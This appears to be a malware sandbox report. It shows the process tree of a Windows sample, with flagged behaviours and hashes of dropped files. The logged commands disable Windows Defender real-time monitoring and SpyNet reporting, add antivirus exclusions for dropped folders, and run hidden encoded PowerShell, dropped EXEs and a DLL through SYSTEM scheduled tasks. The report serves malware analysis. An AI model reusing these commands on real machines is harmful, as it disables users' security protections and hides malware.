\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1096
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:932 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1944
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1888
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXUAFGVyX" /SC once /ST 02:38:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXUAFGVyX"4⤵PID:2044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXUAFGVyX"4⤵PID:1352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbZBZlssUwCOpuYirz" /SC once /ST 04:46:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FsvZBHDEoMJqPIdDe\bnVQRjzMnpkCyOq\AIwWYeG.exe\" Ve /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1160
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {7F9E1EF8-2C71-4F3E-A8DB-4C17239054D5} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2028
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1968
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:684
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1096
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:900
-
C:\Windows\system32\taskeng.exetaskeng.exe {1FE7EC81-2A83-491C-9DD3-5B3554312378} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\FsvZBHDEoMJqPIdDe\bnVQRjzMnpkCyOq\AIwWYeG.exeC:\Users\Admin\AppData\Local\Temp\FsvZBHDEoMJqPIdDe\bnVQRjzMnpkCyOq\AIwWYeG.exe Ve /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:616 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdOEPdRWA" /SC once /ST 02:25:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdOEPdRWA"3⤵PID:756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdOEPdRWA"3⤵PID:1680
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:976
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1420
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1724
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvRuqGIiU" /SC once /ST 00:39:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvRuqGIiU"3⤵PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvRuqGIiU"3⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:323⤵PID:1148
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:643⤵PID:1028
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:323⤵PID:1728
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:324⤵PID:1720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:643⤵PID:1620
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:644⤵PID:1940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\DILCTKEfLzwxpUyr\viLUMNtR\HDMewQNosHzdXfPF.wsf"3⤵PID:1684
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\DILCTKEfLzwxpUyr\viLUMNtR\HDMewQNosHzdXfPF.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1360 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JZGCYhgnU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JZGCYhgnU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SrbNtFTauyXrrauqwiR" /t REG_DWORD /d 0 /reg:324⤵PID:984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SrbNtFTauyXrrauqwiR" /t REG_DWORD /d 0 /reg:644⤵PID:1648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lddEbzjsVrMsC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lddEbzjsVrMsC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nzSBDbWiXDUn" /t REG_DWORD /d 0 /reg:324⤵PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nzSBDbWiXDUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obMwGijWRaGU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obMwGijWRaGU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tNfKPRmJVxztHuVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tNfKPRmJVxztHuVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FsvZBHDEoMJqPIdDe" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FsvZBHDEoMJqPIdDe" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JZGCYhgnU" /t REG_DWORD /d 0 /reg:324⤵PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JZGCYhgnU" /t REG_DWORD /d 0 /reg:644⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SrbNtFTauyXrrauqwiR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SrbNtFTauyXrrauqwiR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lddEbzjsVrMsC" /t REG_DWORD /d 0 /reg:324⤵PID:1328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lddEbzjsVrMsC" /t REG_DWORD /d 0 /reg:644⤵PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nzSBDbWiXDUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nzSBDbWiXDUn" /t REG_DWORD /d 0 /reg:644⤵PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obMwGijWRaGU2" /t REG_DWORD /d 0 /reg:324⤵PID:1832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obMwGijWRaGU2" /t REG_DWORD /d 0 /reg:644⤵PID:608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tNfKPRmJVxztHuVB" /t REG_DWORD /d 0 /reg:324⤵PID:2040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tNfKPRmJVxztHuVB" /t REG_DWORD /d 0 /reg:644⤵PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FsvZBHDEoMJqPIdDe" /t REG_DWORD /d 0 /reg:324⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FsvZBHDEoMJqPIdDe" /t REG_DWORD /d 0 /reg:644⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:324⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\DILCTKEfLzwxpUyr" /t REG_DWORD /d 0 /reg:644⤵PID:1068
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmajRVroU" /SC once /ST 01:04:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmajRVroU"3⤵PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmajRVroU"3⤵PID:1164
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1732
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1752
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1892
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WYhCOaFbDtTPETeNM" /SC once /ST 01:46:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\DILCTKEfLzwxpUyr\QKfhwJCrBUFqObT\GKsdSKe.exe\" bM /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WYhCOaFbDtTPETeNM"3⤵PID:1028
-
-
-
C:\Windows\Temp\DILCTKEfLzwxpUyr\QKfhwJCrBUFqObT\GKsdSKe.exeC:\Windows\Temp\DILCTKEfLzwxpUyr\QKfhwJCrBUFqObT\GKsdSKe.exe bM /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1856 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbZBZlssUwCOpuYirz"3⤵PID:672
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1700
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:872
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1068
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JZGCYhgnU\kprIEK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OCFazbYebRpcntc" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OCFazbYebRpcntc2" /F /xml "C:\Program Files (x86)\JZGCYhgnU\OtIlmba.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OCFazbYebRpcntc"3⤵PID:1204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OCFazbYebRpcntc"3⤵PID:1996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KjOYKzqipJuSsk" /F /xml "C:\Program Files (x86)\obMwGijWRaGU2\KtopUFT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lrmTaDZeykmwO2" /F /xml "C:\ProgramData\tNfKPRmJVxztHuVB\icwiXId.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZxASZCXabKoYHCLah2" /F /xml "C:\Program Files (x86)\SrbNtFTauyXrrauqwiR\grfOmcR.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IrgCgFHrAJQiFiSloUs2" /F /xml "C:\Program Files (x86)\lddEbzjsVrMsC\uyigtin.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AnwxygIojuyXYtxEH" /SC once /ST 00:40:45 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\DILCTKEfLzwxpUyr\HNDPkeVn\EehdIVL.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AnwxygIojuyXYtxEH"3⤵PID:1148
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:956
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1544
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:296
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WYhCOaFbDtTPETeNM"3⤵PID:2000
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\DILCTKEfLzwxpUyr\HNDPkeVn\EehdIVL.dll",#1 /site_id 5254032⤵PID:976
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\DILCTKEfLzwxpUyr\HNDPkeVn\EehdIVL.dll",#1 /site_id 5254033⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:284
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1148
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2044
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:572
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53860a8e9c0992bb8b88ab9165dbd9213
SHA10bc95225fed0b404dd5cc87863b51501b8d4705c
SHA25602772d44ea934116b784821991db6dc11ec0955c60f875b3c58961f966e11141
SHA512ade2aee9b7e33b7a64e3191f18a2b4b14e4ca9ce0886285669525421de7ce059b95a3a07f57be1f0a3ad35f17ce2e5af09b7ee096f11ab4b04e48ce756091b1e
-
Filesize
2KB
MD5e1b5aaa267350f981ceea176639a9956
SHA1a0463a2af65a27b7a0eea05050026b4b098a4500
SHA256c6db48c43240a2d1ef318150dfd64d62fa70f4821fbeabdf607fba19be7cb416
SHA512ec82acaed32f3fe0410b50f6dbe93351d0d64c4c0335f482a76b4cbd69574b52def5446c39c726caef7f82dd773ba2e13c19ef4216dd9169d5c80e399d109634
-
Filesize
2KB
MD57e6f074827f0fb1f9b78eb507a7f7f1e
SHA1533fcd8fc31ad4ab5beddf5749c0890488c71b70
SHA2566d1567bd62d78e1d8723c668a12028c098496acca9ed35bdf92c6aaca163132c
SHA51262641b053213afdde43c48d8e345583f8fc3b6ec878d34cc3ee72eb6e86a8055d6aec22946e76b06a96f8d0a39a859c7b126175fd9a80dce9ef22f61e23e75dc
-
Filesize
2KB
MD58fe6dc9e908e4c4e53e3f7d2e3df9c29
SHA15ef80337dd36c98f08f36beb826a133b4b01faed
SHA256b8cd287b7875a88d9a95a1af636423546b77ab80fc95a767829904048b822920
SHA512c837361292c085a78e4f9ed43e97a41bdc92e8641f9213c60e44c7d5c89dde07910bd7e68618920660e67f64f5e288ab1e73978c25aef250a110fa2a3fb561ef
-
Filesize
2KB
MD59d32e361a0c7ca22b79b3373feba2619
SHA13fe224b743e773966868c066a9005e1d17870c3c
